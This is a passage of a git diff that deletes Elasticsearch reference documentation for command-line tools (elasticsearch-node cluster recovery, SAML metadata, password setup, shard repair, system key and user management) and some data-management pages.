- -Each node stores its data in the data directories defined by the -<>. This means that in a disaster you can -also restart a node by moving its data directories to another host, presuming -that those data directories can be recovered from the faulty host. - -{es} <> in order to elect a master and to update the cluster -state. This means that if you have three master-eligible nodes then the cluster -will remain available even if one of them has failed. However if two of the -three master-eligible nodes fail then the cluster will be unavailable until at -least one of them is restarted. - -In very rare circumstances it may not be possible to restart enough nodes to -restore the cluster's availability. If such a disaster occurs, you should -build a new cluster from a recent snapshot and re-import any data that was -ingested since that snapshot was taken. - -However, if the disaster is serious enough then it may not be possible to -recover from a recent snapshot either. Unfortunately in this case there is no -way forward that does not risk data loss, but it may be possible to use the -`elasticsearch-node` tool to construct a new cluster that contains some of the -data from the failed cluster. - -[[node-tool-override-version]] -[discrete] -==== Bypassing version checks - -The data that {es} writes to disk is designed to be read by the current version -and a limited set of future versions. It cannot generally be read by older -versions, nor by versions that are more than one major version newer. The data -stored on disk includes the version of the node that wrote it, and {es} checks -that it is compatible with this version when starting up. - -In rare circumstances it may be desirable to bypass this check and start up an -{es} node using data that was written by an incompatible version. This may not -work if the format of the stored data has changed, and it is a risky process -because it is possible for the format to change in ways that {es} may -misinterpret, silently leading to data loss. - -To bypass this check, you can use the `elasticsearch-node override-version` -tool to overwrite the version number stored in the data path with the current -version, causing {es} to believe that it is compatible with the on-disk data. - -[[node-tool-unsafe-bootstrap]] -[discrete] -===== Unsafe cluster bootstrapping - -If there is at least one remaining master-eligible node, but it is not possible -to restart a majority of them, then the `elasticsearch-node unsafe-bootstrap` -command will unsafely override the cluster's <> as if performing another -<>. -The target node can then form a new cluster on its own by using -the cluster metadata held locally on the target node. - -[WARNING] -These steps can lead to arbitrary data loss since the target node may not hold the latest cluster -metadata, and this out-of-date metadata may make it impossible to use some or -all of the indices in the cluster. - -Since unsafe bootstrapping forms a new cluster containing a single node, once -you have run it you must use the <> to migrate any other surviving nodes from the failed -cluster into this new cluster. - -When you run the `elasticsearch-node unsafe-bootstrap` tool it will analyse the -state of the node and ask for confirmation before taking any action. Before -asking for confirmation it reports the term and version of the cluster state on -the node on which it runs as follows: - -[source,txt] ----- -Current node cluster state (term, version) pair is (4, 12) ----- - -If you have a choice of nodes on which to run this tool then you should choose -one with a term that is as large as possible. If there is more than one -node with the same term, pick the one with the largest version. -This information identifies the node with the freshest cluster state, which minimizes the -quantity of data that might be lost. For example, if the first node reports -`(4, 12)` and a second node reports `(5, 3)`, then the second node is preferred -since its term is larger. However if the second node reports `(3, 17)` then -the first node is preferred since its term is larger. If the second node -reports `(4, 10)` then it has the same term as the first node, but has a -smaller version, so the first node is preferred. - -[WARNING] -Running this command can lead to arbitrary data loss. Only run this tool if you -understand and accept the possible consequences and have exhausted all other -possibilities for recovery of your cluster. - -The sequence of operations for using this tool are as follows: - -1. Make sure you have really lost access to at least half of the -master-eligible nodes in the cluster, and they cannot be repaired or recovered -by moving their data paths to healthy hardware. -2. Stop **all** remaining nodes. -3. Choose one of the remaining master-eligible nodes to become the new elected -master as described above. -4. On this node, run the `elasticsearch-node unsafe-bootstrap` command as shown -below. Verify that the tool reported `Master node was successfully -bootstrapped`. -5. Start this node and verify that it is elected as the master node. -6. Run the <>, described below, on every other node in the cluster. -7. Start all other nodes and verify that each one joins the cluster. -8. Investigate the data in the cluster to discover if any was lost during this -process. - -When you run the tool it will make sure that the node that is being used to -bootstrap the cluster is not running. It is important that all other -master-eligible nodes are also stopped while this tool is running, but the tool -does not check this. - -The message `Master node was successfully bootstrapped` does not mean that -there has been no data loss, it just means that tool was able to complete its -job. - -[[node-tool-detach-cluster]] -[discrete] -===== Detaching nodes from their cluster - -It is unsafe for nodes to move between clusters, because different clusters -have completely different cluster metadata. There is no way to safely merge the -metadata from two clusters together. - -To protect against inadvertently joining the wrong cluster, each cluster -creates a unique identifier, known as the _cluster UUID_, when it first starts -up. Every node records the UUID of its cluster and refuses to join a -cluster with a different UUID. - -However, if a node's cluster has permanently failed then it may be desirable to -try and move it into a new cluster. The `elasticsearch-node detach-cluster` -command lets you detach a node from its cluster by resetting its cluster UUID. -It can then join another cluster with a different UUID. - -For example, after unsafe cluster bootstrapping you will need to detach all the -other surviving nodes from their old cluster so they can join the new, -unsafely-bootstrapped cluster. - -Unsafe cluster bootstrapping is only possible if there is at least one -surviving master-eligible node. If there are no remaining master-eligible nodes -then the cluster metadata is completely lost. However, the individual data -nodes also contain a copy of the index metadata corresponding with their -shards. This sometimes allows a new cluster to import these shards as -<>. You can sometimes -recover some indices after the loss of all master-eligible nodes in a cluster -by creating a new cluster and then using the `elasticsearch-node -detach-cluster` command to move any surviving nodes into this new cluster. - -There is a risk of data loss when importing a dangling index because data nodes -may not have the most recent copy of the index metadata and do not have any -information about <>. This -means that a stale shard copy may be selected to be the primary, and some of -the shards may be incompatible with the imported mapping. - -[WARNING] -Execution of this command can lead to arbitrary data loss. Only run this tool -if you understand and accept the possible consequences and have exhausted all -other possibilities for recovery of your cluster. - -The sequence of operations for using this tool are as follows: - -1. Make sure you have really lost access to every one of the master-eligible -nodes in the cluster, and they cannot be repaired or recovered by moving their -data paths to healthy hardware. -2. Start a new cluster and verify that it is healthy. This cluster may comprise -one or more brand-new master-eligible nodes, or may be an unsafely-bootstrapped -cluster formed as described above. -3. Stop **all** remaining data nodes. -4. On each data node, run the `elasticsearch-node detach-cluster` tool as shown -below. Verify that the tool reported `Node was successfully detached from the -cluster`. -5. If necessary, configure each data node to -<>. -6. Start each data node and verify that it has joined the new cluster. -7. Wait for all recoveries to have completed, and investigate the data in the -cluster to discover if any was lost during this process. - -The message `Node was successfully detached from the cluster` does not mean -that there has been no data loss, it just means that tool was able to complete -its job. - - -[discrete] -[[node-tool-parameters]] -=== Parameters - -`repurpose`:: Delete excess data when a node's roles are changed. - -`unsafe-bootstrap`:: Specifies to unsafely bootstrap this node as a new -one-node cluster. - -`detach-cluster`:: Specifies to unsafely detach this node from its cluster so -it can join a different cluster. - -`override-version`:: Overwrites the version number stored in the data path so -that a node can start despite being incompatible with the on-disk data. - -`remove-settings`:: Forcefully removes the provided persistent cluster settings -from the on-disk cluster state. - -`--ordinal `:: If there is <> then this specifies which node to target. Defaults -to `0`, meaning to use the first node in the data path. - -`-E `:: Configures a setting. - -`-h, --help`:: Returns all of the command parameters. - -`-s, --silent`:: Shows minimal output. - -`-v, --verbose`:: Shows verbose output. - -[discrete] -=== Examples - -[discrete] -==== Repurposing a node as a dedicated master node - -In this example, a former data node is repurposed as a dedicated master node. -First update the node's settings to `node.roles: [ "master" ]` in its -`elasticsearch.yml` config file. Then run the `elasticsearch-node repurpose` -command to find and remove excess shard data: - -[source,txt] ----- -node$ ./bin/elasticsearch-node repurpose - - WARNING: Elasticsearch MUST be stopped before running this tool. - -Found 2 shards in 2 indices to clean up -Use -v to see list of paths and indices affected -Node is being re-purposed as master and no-data. Clean-up of shard data will be performed. -Do you want to proceed? -Confirm [y/N] y -Node successfully repurposed to master and no-data. ----- - -[discrete] -==== Repurposing a node as a coordinating-only node - -In this example, a node that previously held data is repurposed as a -coordinating-only node. First update the node's settings to `node.roles: []` in -its `elasticsearch.yml` config file. Then run the `elasticsearch-node repurpose` -command to find and remove excess shard data and index metadata: - - -[source,txt] ----- -node$./bin/elasticsearch-node repurpose - - WARNING: Elasticsearch MUST be stopped before running this tool. - -Found 2 indices (2 shards and 2 index meta data) to clean up -Use -v to see list of paths and indices affected -Node is being re-purposed as no-master and no-data. Clean-up of index data will be performed. -Do you want to proceed? -Confirm [y/N] y -Node successfully repurposed to no-master and no-data. ----- - -[discrete] -==== Removing persistent cluster settings - -If your nodes contain persistent cluster settings that prevent the cluster -from forming, i.e., can't be removed using the <> API, -you can run the following commands to remove one or more cluster settings. - -[source,txt] ----- -node$ ./bin/elasticsearch-node remove-settings xpack.monitoring.exporters.my_exporter.host - - WARNING: Elasticsearch MUST be stopped before running this tool. - -The following settings will be removed: -xpack.monitoring.exporters.my_exporter.host: "10.1.2.3" - -You should only run this tool if you have incompatible settings in the -cluster state that prevent the cluster from forming. -This tool can cause data loss and its use should be your last resort. - -Do you want to proceed? - -Confirm [y/N] y - -Settings were successfully removed from the cluster state ----- - -You can also use wildcards to remove multiple settings, for example using - -[source,txt] ----- -node$ ./bin/elasticsearch-node remove-settings xpack.monitoring.* ----- - -[discrete] -==== Removing custom metadata from the cluster state - -If the on-disk cluster state contains custom metadata that prevents the node -from starting up and loading the cluster state, you can run the following -commands to remove this custom metadata. - -[source,txt] ----- -node$ ./bin/elasticsearch-node remove-customs snapshot_lifecycle - - WARNING: Elasticsearch MUST be stopped before running this tool. - -The following customs will be removed: -snapshot_lifecycle - -You should only run this tool if you have broken custom metadata in the -cluster state that prevents the cluster state from being loaded. -This tool can cause data loss and its use should be your last resort. - -Do you want to proceed? - -Confirm [y/N] y - -Customs were successfully removed from the cluster state ----- - -[discrete] -==== Unsafe cluster bootstrapping - -Suppose your cluster had five master-eligible nodes and you have permanently -lost three of them, leaving two nodes remaining. - -* Run the tool on the first remaining node, but answer `n` at the confirmation - step. - -[source,txt] ----- -node_1$ ./bin/elasticsearch-node unsafe-bootstrap - - WARNING: Elasticsearch MUST be stopped before running this tool. - -Current node cluster state (term, version) pair is (4, 12) - -You should only run this tool if you have permanently lost half or more -of the master-eligible nodes in this cluster, and you cannot restore the -cluster from a snapshot. This tool can cause arbitrary data loss and its -use should be your last resort. If you have multiple surviving master -eligible nodes, you should run this tool on the node with the highest -cluster state (term, version) pair. - -Do you want to proceed? - -Confirm [y/N] n ----- - -* Run the tool on the second remaining node, and again answer `n` at the - confirmation step. - -[source,txt] ----- -node_2$ ./bin/elasticsearch-node unsafe-bootstrap - - WARNING: Elasticsearch MUST be stopped before running this tool. - -Current node cluster state (term, version) pair is (5, 3) - -You should only run this tool if you have permanently lost half or more -of the master-eligible nodes in this cluster, and you cannot restore the -cluster from a snapshot. This tool can cause arbitrary data loss and its -use should be your last resort. If you have multiple surviving master -eligible nodes, you should run this tool on the node with the highest -cluster state (term, version) pair. - -Do you want to proceed? - -Confirm [y/N] n ----- - -* Since the second node has a greater term it has a fresher cluster state, so - it is better to unsafely bootstrap the cluster using this node: - -[source,txt] ----- -node_2$ ./bin/elasticsearch-node unsafe-bootstrap - - WARNING: Elasticsearch MUST be stopped before running this tool. - -Current node cluster state (term, version) pair is (5, 3) - -You should only run this tool if you have permanently lost half or more -of the master-eligible nodes in this cluster, and you cannot restore the -cluster from a snapshot. This tool can cause arbitrary data loss and its -use should be your last resort. If you have multiple surviving master -eligible nodes, you should run this tool on the node with the highest -cluster state (term, version) pair. - -Do you want to proceed? - -Confirm [y/N] y -Master node was successfully bootstrapped ----- - -[discrete] -==== Detaching nodes from their cluster - -After unsafely bootstrapping a new cluster, run the `elasticsearch-node -detach-cluster` command to detach all remaining nodes from the failed cluster -so they can join the new cluster: - -[source, txt] ----- -node_3$ ./bin/elasticsearch-node detach-cluster - - WARNING: Elasticsearch MUST be stopped before running this tool. - -You should only run this tool if you have permanently lost all of the -master-eligible nodes in this cluster and you cannot restore the cluster -from a snapshot, or you have already unsafely bootstrapped a new cluster -by running `elasticsearch-node unsafe-bootstrap` on a master-eligible -node that belonged to the same cluster as this node. This tool can cause -arbitrary data loss and its use should be your last resort. - -Do you want to proceed? - -Confirm [y/N] y -Node was successfully detached from the cluster ----- - -[discrete] -==== Bypassing version checks - -Run the `elasticsearch-node override-version` command to overwrite the version -stored in the data path so that a node can start despite being incompatible -with the data stored in the data path: - -[source, txt] ----- -node$ ./bin/elasticsearch-node override-version - - WARNING: Elasticsearch MUST be stopped before running this tool. - -This data path was last written by Elasticsearch version [x.x.x] and may no -longer be compatible with Elasticsearch version [y.y.y]. This tool will bypass -this compatibility check, allowing a version [y.y.y] node to start on this data -path, but a version [y.y.y] node may not be able to read this data or may read -it incorrectly leading to data loss. - -You should not use this tool. Instead, continue to use a version [x.x.x] node -on this data path. If necessary, you can use reindex-from-remote to copy the -data from here into an older cluster. - -Do you want to proceed? - -Confirm [y/N] y -Successfully overwrote this node's metadata to bypass its version compatibility checks. ----- diff --git a/docs/reference/commands/saml-metadata.asciidoc b/docs/reference/commands/saml-metadata.asciidoc deleted file mode 100644 index 9c6f2133be9..00000000000 --- a/docs/reference/commands/saml-metadata.asciidoc +++ /dev/null @@ -1,138 +0,0 @@ -[role="xpack"] -[testenv="gold+"] -[[saml-metadata]] -== elasticsearch-saml-metadata - -The `elasticsearch-saml-metadata` command can be used to generate a SAML 2.0 Service -Provider Metadata file. - -[discrete] -=== Synopsis - -[source,shell] --------------------------------------------------- -bin/elasticsearch-saml-metadata -[--realm ] -[--out ] [--batch] -[--attribute ] [--service-name ] -[--locale ] [--contacts] -([--organisation-name ] [--organisation-display-name ] [--organisation-url ]) -([--signing-bundle ] | [--signing-cert ][--signing-key ]) -[--signing-key-password ] -[-E ] -[-h, --help] ([-s, --silent] | [-v, --verbose]) --------------------------------------------------- - -[discrete] -=== Description - -The SAML 2.0 specification provides a mechanism for Service Providers to -describe their capabilities and configuration using a _metadata file_. - -The `elasticsearch-saml-metadata` command generates such a file, based on the -configuration of a SAML realm in {es}. - -Some SAML Identity Providers will allow you to automatically import a metadata -file when you configure the Elastic Stack as a Service Provider. - -You can optionally select to digitally sign the metadata file in order to -ensure its integrity and authenticity before sharing it with the Identity Provider. -The key used for signing the metadata file need not necessarily be the same as -the keys already used in the saml realm configuration for SAML message signing. - -If your {es} keystore is password protected, you -are prompted to enter the password when you run the -`elasticsearch-saml-metadata` command. - -[discrete] -[[saml-metadata-parameters]] -=== Parameters - -`--attribute `:: Specifies a SAML attribute that should be -included as a `` element in the metadata. Any attribute -configured in the {es} realm is automatically included and does not need to be -specified as a commandline option. - -`--batch`:: Do not prompt for user input. - -`--contacts`:: Specifies that the metadata should include one or more -`` elements. The user will be prompted to enter the details for -each person. - -`-E `:: Configures an {es} setting. - -`-h, --help`:: Returns all of the command parameters. - -`--locale `:: Specifies the locale to use for metadata elements such as -``. Defaults to the JVM's default system locale. - -`--organisation-display-name ` element. -Only valid if `--organisation-name` is also specified. - -`--organisation-name `:: Specifies that an `` element should -be included in the metadata and provides the value for the ``. -If this is specified, then `--organisation-url` must also be specified. - -`--organisation-url `:: Specifies the value of the `` -element. This is required if `--organisation-name` is specified. - -`--out `:: Specifies a path for the output files. -Defaults to `saml-elasticsearch-metadata.xml` - -`--service-name `:: Specifies the value for the `` element in -the metadata. Defaults to `elasticsearch`. - -`--signing-bundle `:: Specifies the path to an existing key pair -(in PKCS#12 format). The private key of that key pair will be used to sign -the metadata file. - -`--signing-cert `:: Specifies the path to an existing certificate (in -PEM format) to be used for signing of the metadata file. You must also specify -the `--signing-key` parameter. This parameter cannot be used with the -`--signing-bundle` parameter. - -`--signing-key `:: Specifies the path to an existing key (in PEM format) -to be used for signing of the metadata file. You must also specify the -`--signing-cert` parameter. This parameter cannot be used with the -`--signing-bundle` parameter. - -`--signing-key-password `:: Specifies the password for the signing key. -It can be used with either the `--signing-key` or the `--signing-bundle` parameters. - -`--realm `:: Specifies the name of the realm for which the metadata -should be generated. This parameter is required if there is more than 1 `saml` -realm in your {es} configuration. - -`-s, --silent`:: Shows minimal output. - -`-v, --verbose`:: Shows verbose output. - -[discrete] -=== Examples - -The following command generates a default metadata file for the `saml1` realm: - -[source, sh] --------------------------------------------------- -bin/elasticsearch-saml-metadata --realm saml1 --------------------------------------------------- - -The file will be written to `saml-elasticsearch-metadata.xml`. -You may be prompted to provide the "friendlyName" value for any attributes that -are used by the realm. - -The following command generates a metadata file for the `saml2` realm, with a -`` of `kibana-finance`, a locale of `en-GB` and includes -`` elements and an `` element: - -[source, sh] --------------------------------------------------- -bin/elasticsearch-saml-metadata --realm saml2 \ - --service-name kibana-finance \ - --locale en-GB \ - --contacts \ - --organisation-name "Mega Corp. Finance Team" \ - --organisation-url "http://mega.example.com/finance/" --------------------------------------------------- - diff --git a/docs/reference/commands/setup-passwords.asciidoc b/docs/reference/commands/setup-passwords.asciidoc deleted file mode 100644 index 7a443b492d4..00000000000 --- a/docs/reference/commands/setup-passwords.asciidoc +++ /dev/null @@ -1,76 +0,0 @@ -[role="xpack"] -[testenv="gold+"] -[[setup-passwords]] -== elasticsearch-setup-passwords - -The `elasticsearch-setup-passwords` command sets the passwords for the -<>. - -[discrete] -=== Synopsis - -[source,shell] --------------------------------------------------- -bin/elasticsearch-setup-passwords auto|interactive -[-b, --batch] [-h, --help] [-E ] -[-s, --silent] [-u, --url ""] [-v, --verbose] --------------------------------------------------- - -[discrete] -=== Description - -This command is intended for use only during the initial configuration of the -{es} {security-features}. It uses the -<> -to run user management API requests. If your {es} keystore is password protected, -before you can set the passwords for the built-in users, you must enter the keystore password. -After you set a password for the `elastic` -user, the bootstrap password is no longer active and you cannot use this command. -Instead, you can change passwords by using the *Management > Users* UI in {kib} -or the <>. - -This command uses an HTTP connection to connect to the cluster and run the user -management requests. If your cluster uses TLS/SSL on the HTTP layer, the command -automatically attempts to establish the connection by using the HTTPS protocol. -It configures the connection by using the `xpack.security.http.ssl` settings in -the `elasticsearch.yml` file. If you do not use the default config directory -location, ensure that the *ES_PATH_CONF* environment variable returns the -correct path before you run the `elasticsearch-setup-passwords` command. You can -override settings in your `elasticsearch.yml` file by using the `-E` command -option. For more information about debugging connection failures, see -<>. - -[discrete] -[[setup-passwords-parameters]] -=== Parameters - -`auto`:: Outputs randomly-generated passwords to the console. - -`-b, --batch`:: If enabled, runs the change password process without prompting the -user. - -`-E `:: Configures a standard {es} or {xpack} setting. - -`-h, --help`:: Shows help information. - -`interactive`:: Prompts you to manually enter passwords. - -`-s, --silent`:: Shows minimal output. - -`-u, --url ""`:: Specifies the URL that the tool uses to submit the user management API -requests. The default value is determined from the settings in your -`elasticsearch.yml` file. If `xpack.security.http.ssl.enabled` is set to `true`, -you must specify an HTTPS URL. - -`-v, --verbose`:: Shows verbose output. - -[discrete] -=== Examples - -The following example uses the `-u` parameter to tell the tool where to submit -its user management API requests: - -[source,shell] --------------------------------------------------- -bin/elasticsearch-setup-passwords auto -u "http://localhost:9201" --------------------------------------------------- diff --git a/docs/reference/commands/shard-tool.asciidoc b/docs/reference/commands/shard-tool.asciidoc deleted file mode 100644 index 42069e50325..00000000000 --- a/docs/reference/commands/shard-tool.asciidoc +++ /dev/null @@ -1,123 +0,0 @@ -[[shard-tool]] -== elasticsearch-shard - -In some cases the Lucene index or translog of a shard copy can become corrupted. -The `elasticsearch-shard` command enables you to remove corrupted parts of the -shard if a good copy of the shard cannot be recovered automatically or restored -from backup. - -[WARNING] -You will lose the corrupted data when you run `elasticsearch-shard`. This tool -should only be used as a last resort if there is no way to recover from another -copy of the shard or restore a snapshot. - -[discrete] -=== Synopsis - -[source,shell] --------------------------------------------------- -bin/elasticsearch-shard remove-corrupted-data - ([--index ] [--shard-id ] | [--dir ]) - [--truncate-clean-translog] - [-E ] - [-h, --help] ([-s, --silent] | [-v, --verbose]) --------------------------------------------------- - -[discrete] -=== Description - -When {es} detects that a shard's data is corrupted, it fails that shard copy and -refuses to use it. Under normal conditions, the shard is automatically recovered -from another copy. If no good copy of the shard is available and you cannot -restore one from a snapshot, you can use `elasticsearch-shard` to remove the -corrupted data and restore access to any remaining data in unaffected segments. - -[WARNING] -Stop Elasticsearch before running `elasticsearch-shard`. - -To remove corrupted shard data use the `remove-corrupted-data` subcommand. - -There are two ways to specify the path: - -* Specify the index name and shard name with the `--index` and `--shard-id` - options. -* Use the `--dir` option to specify the full path to the corrupted index or - translog files. - -[discrete] -==== Removing corrupted data - -`elasticsearch-shard` analyses the shard copy and provides an overview of the -corruption found. To proceed you must then confirm that you want to remove the -corrupted data. - -[WARNING] -Back up your data before running `elasticsearch-shard`. This is a destructive -operation that removes corrupted data from the shard. - -[source,txt] --------------------------------------------------- -$ bin/elasticsearch-shard remove-corrupted-data --index my-index-000001 --shard-id 0 - - - WARNING: Elasticsearch MUST be stopped before running this tool. - - Please make a complete backup of your index before using this tool. - - -Opening Lucene index at /var/lib/elasticsearchdata/nodes/0/indices/P45vf_YQRhqjfwLMUvSqDw/0/index/ - - >> Lucene index is corrupted at /var/lib/elasticsearchdata/nodes/0/indices/P45vf_YQRhqjfwLMUvSqDw/0/index/ - -Opening translog at /var/lib/elasticsearchdata/nodes/0/indices/P45vf_YQRhqjfwLMUvSqDw/0/translog/ - - - >> Translog is clean at /var/lib/elasticsearchdata/nodes/0/indices/P45vf_YQRhqjfwLMUvSqDw/0/translog/ - - - Corrupted Lucene index segments found - 32 documents will be lost. - - WARNING: YOU WILL LOSE DATA. - -Continue and remove docs from the index ? Y - -WARNING: 1 broken segments (containing 32 documents) detected -Took 0.056 sec total. -Writing... -OK -Wrote new segments file "segments_c" -Marking index with the new history uuid : 0pIBd9VTSOeMfzYT6p0AsA -Changing allocation id V8QXk-QXSZinZMT-NvEq4w to tjm9Ve6uTBewVFAlfUMWjA - -You should run the following command to allocate this shard: - -POST /_cluster/reroute -{ - "commands" : [ - { - "allocate_stale_primary" : { - "index" : "index42", - "shard" : 0, - "node" : "II47uXW2QvqzHBnMcl2o_Q", - "accept_data_loss" : false - } - } - ] -} - -You must accept the possibility of data loss by changing the `accept_data_loss` parameter to `true`. - -Deleted corrupt marker corrupted_FzTSBSuxT7i3Tls_TgwEag from /var/lib/elasticsearchdata/nodes/0/indices/P45vf_YQRhqjfwLMUvSqDw/0/index/ - --------------------------------------------------- - -When you use `elasticsearch-shard` to drop the corrupted data, the shard's -allocation ID changes. After restarting the node, you must use the -<> to tell Elasticsearch to use the new ID. -The `elasticsearch-shard` command shows the request that you need to submit. - -You can also use the `-h` option to get a list of all options and parameters -that the `elasticsearch-shard` tool supports. - -Finally, you can use the `--truncate-clean-translog` option to truncate the -shard's translog even if it does not appear to be corrupt. diff --git a/docs/reference/commands/syskeygen.asciidoc b/docs/reference/commands/syskeygen.asciidoc deleted file mode 100644 index a42bb3b6bd7..00000000000 --- a/docs/reference/commands/syskeygen.asciidoc +++ /dev/null @@ -1,54 +0,0 @@ -[role="xpack"] -[testenv="gold+"] -[[syskeygen]] -== elasticsearch-syskeygen - -The `elasticsearch-syskeygen` command creates a system key file in the -elasticsearch config directory. - -[discrete] -=== Synopsis - -[source,shell] --------------------------------------------------- -bin/elasticsearch-syskeygen -[-E ] [-h, --help] -([-s, --silent] | [-v, --verbose]) --------------------------------------------------- - -[discrete] -=== Description - -The command generates a `system_key` file, which you can use to symmetrically -encrypt sensitive data. For example, you can use this key to prevent {watcher} -from returning and storing information that contains clear text credentials. See -<>. - -IMPORTANT: The system key is a symmetric key, so the same key must be used on -every node in the cluster. - -[discrete] -[[syskeygen-parameters]] -=== Parameters - -`-E `:: Configures a setting. For example, if you have a custom -installation of {es}, you can use this parameter to specify the `ES_PATH_CONF` -environment variable. - -`-h, --help`:: Returns all of the command parameters. - -`-s, --silent`:: Shows minimal output. - -`-v, --verbose`:: Shows verbose output. - - -[discrete] -=== Examples - -The following command generates a `system_key` file in the -default `$ES_HOME/config` directory: - -[source, sh] --------------------------------------------------- -bin/elasticsearch-syskeygen --------------------------------------------------- diff --git a/docs/reference/commands/users-command.asciidoc b/docs/reference/commands/users-command.asciidoc deleted file mode 100644 index dca812db06f..00000000000 --- a/docs/reference/commands/users-command.asciidoc +++ /dev/null @@ -1,137 +0,0 @@ -[role="xpack"] -[testenv="gold+"] -[[users-command]] -== elasticsearch-users - -If you use file-based user authentication, the `elasticsearch-users` command -enables you to add and remove users, assign user roles, and manage passwords. - -[discrete] -=== Synopsis - -[source,shell] --------------------------------------------------- -bin/elasticsearch-users -([useradd ] [-p ] [-r ]) | -([list] ) | -([passwd ] [-p ]) | -([roles ] [-a ] [-r ]) | -([userdel ]) --------------------------------------------------- - -[discrete] -=== Description - -If you use the built-in `file` internal realm, users are defined in local files -on each node in the cluster. - -Usernames and roles must be at least 1 and no more than 1024 characters. They -can contain alphanumeric characters (`a-z`, `A-Z`, `0-9`), spaces, punctuation, -and printable symbols in the -{wikipedia}/Basic_Latin_(Unicode_block)[Basic Latin (ASCII) block]. -Leading or trailing whitespace is not allowed. - -Passwords must be at least 6 characters long. - -For more information, see <>. - -TIP: To ensure that {es} can read the user and role information at startup, run -`elasticsearch-users useradd` as the same user you use to run {es}. Running the -command as root or some other user updates the permissions for the `users` and -`users_roles` files and prevents {es} from accessing them. - -[discrete] -[[users-command-parameters]] -=== Parameters - -`-a `:: If used with the `roles` parameter, adds a comma-separated list -of roles to a user. - -//`-h, --help`:: Returns all of the command parameters. - -`list`:: List the users that are registered with the `file` realm -on the local node. If you also specify a user name, the command provides -information for that user. - -`-p `:: Specifies the user's password. If you do not specify this -parameter, the command prompts you for the password. -+ --- -TIP: Omit the `-p` option to keep -plaintext passwords out of the terminal session's command history. - --- - -`passwd `:: Resets a user's password. You can specify the new -password directly with the `-p` parameter. - -`-r `:: -* If used with the `useradd` parameter, defines a user's roles. This option -accepts a comma-separated list of role names to assign to the user. -* If used with the `roles` parameter, removes a comma-separated list of roles -from a user. - -`roles`:: Manages the roles of a particular user. You can combine adding and -removing roles within the same command to change a user's roles. - -//`-s, --silent`:: Shows minimal output. - -`useradd `:: Adds a user to your local node. - -`userdel `:: Deletes a user from your local node. - -//`-v, --verbose`:: Shows verbose output. - -//[discrete] -//=== Authorization - -[discrete] -=== Examples - -The following example adds a new user named `jacknich` to the `file` realm. The -password for this user is `theshining`, and this user is associated with the -`network` and `monitoring` roles. - -[source,shell] -------------------------------------------------------------------- -bin/elasticsearch-users useradd jacknich -p theshining -r network,monitoring -------------------------------------------------------------------- - -The following example lists the users that are registered with the `file` realm -on the local node: - -[source, shell] ----------------------------------- -bin/elasticsearch-users list -rdeniro : admin -alpacino : power_user -jacknich : monitoring,network ----------------------------------- - -Users are in the left-hand column and their corresponding roles are listed in -the right-hand column. - -The following example resets the `jacknich` user's password: - -[source,shell] --------------------------------------------------- -bin/elasticsearch-users passwd jachnich --------------------------------------------------- - -Since the `-p` parameter was omitted, the command prompts you to enter and -confirm a password in interactive mode. - -The following example removes the `network` and `monitoring` roles from the -`jacknich` user and adds the `user` role: - -[source,shell] ------------------------------------------------------------- -bin/elasticsearch-users roles jacknich -r network,monitoring -a user ------------------------------------------------------------- - -The following example deletes the `jacknich` user: - -[source,shell] --------------------------------------------------- -bin/elasticsearch-users userdel jacknich --------------------------------------------------- diff --git a/docs/reference/data-management.asciidoc b/docs/reference/data-management.asciidoc deleted file mode 100644 index dc5ca9bd7f2..00000000000 --- a/docs/reference/data-management.asciidoc +++ /dev/null @@ -1,35 +0,0 @@ -[role="xpack"] -[[data-management]] -= Data management - -[partintro] --- -The data you store in {es} generally falls into one of two categories: - -* Content: a collection of items you want to search, such as a catalog of products -* Time series data: a stream of continuously-generated timestamped data, such as log entries - -Content might be frequently updated, -but the value of the content remains relatively constant over time. -You want to be able to retrieve items quickly regardless of how old they are. - -Time series data keeps accumulating over time, so you need strategies for -balancing the value of the data against the cost of storing it. -As it ages, it tends to become less important and less-frequently accessed, -so you can move it to less expensive, less performant hardware. -For your oldest data, what matters is that you have access to the data. -It's ok if queries take longer to complete. - -To help you manage your data, {es} enables you to: - -* Define <> of data nodes with different performance characteristics. -* Automatically transition indices through the data tiers according to your performance needs and retention policies -with <> ({ilm-init}). -* Leverage <> stored in a remote repository to provide resiliency -for your older indices while reducing operating costs and maintaining search performance. -* Perform <> of data stored on less-performant hardware. --- - -include::datatiers.asciidoc[] - -include::indices/index-mgmt.asciidoc[] diff --git a/docs/reference/data-rollup-transform.asciidoc b/docs/reference/data-rollup-transform.asciidoc deleted file mode 100644 index 81ed4a50788..00000000000 --- a/docs/reference/data-rollup-transform.asciidoc +++ /dev/null @@ -1,20 +0,0 @@ -[[data-rollup-transform]] -= Roll up or transform your data - -[partintro] --- - -{es} offers the following methods for manipulating your data: - -* <> -+ -include::rollup/index.asciidoc[tag=rollup-intro] -* <> -+ -include::transform/transforms.asciidoc[tag=transform-intro] - --- - -include::rollup/index.asciidoc[] - -include::transform/index.asciidoc[] diff --git a/docs/reference/data-streams/change-mappings-and-settings.asciidoc b/docs/reference/data-streams/change-mappings-and-settings.asciidoc deleted file mode 100644 index fb828b5a770..00000000000 --- a/docs/reference/data-streams/change-mappings-and-settings.asciidoc +++ /dev/null @@ -1,673 +0,0 @@ -[role="xpack"] -[[data-streams-change-mappings-and-settings]] -== Change mappings and settings for a data stream - -Each data stream has a <>. Mappings and index settings from this template are applied to new -backing indices created for the stream. This includes the stream's first -backing index, which is auto-generated when the stream is created. - -Before creating a data stream, we recommend you carefully consider which -mappings and settings to include in this template. - -If you later need to change the mappings or settings for a data stream, you have -a few options: - -* <> -* <> -* <> -* <> - -TIP: If your changes include modifications to existing field mappings or -<>, a reindex is often required to -apply the changes to a data stream's backing indices. If you are already -performing a reindex, you can use the same process to add new field -mappings and change <>. See -<>. - -//// -[source,console] ----- -PUT /_ilm/policy/my-data-stream-policy -{ - "policy": { - "phases": { - "hot": { - "actions": { - "rollover": { - "max_size": "25GB" - } - } - }, - "delete": { - "min_age": "30d", - "actions": { - "delete": {} - } - } - } - } -} - -PUT /_index_template/my-data-stream-template -{ - "index_patterns": [ "my-data-stream*" ], - "data_stream": { } -} - -PUT /_index_template/new-data-stream-template -{ - "index_patterns": [ "new-data-stream*" ], - "data_stream": { } -} - -PUT /_data_stream/my-data-stream - -POST /my-data-stream/_rollover/ - -PUT /_data_stream/new-data-stream ----- -// TESTSETUP - -[source,console] ----- -DELETE /_data_stream/* - -DELETE /_index_template/* - -DELETE /_ilm/policy/my-data-stream-policy ----- -// TEARDOWN -//// - -[discrete] -[[add-new-field-mapping-to-a-data-stream]] -=== Add a new field mapping to a data stream - -To add a mapping for a new field to a data stream, following these steps: - -. Update the index template used by the data stream. This ensures the new -field 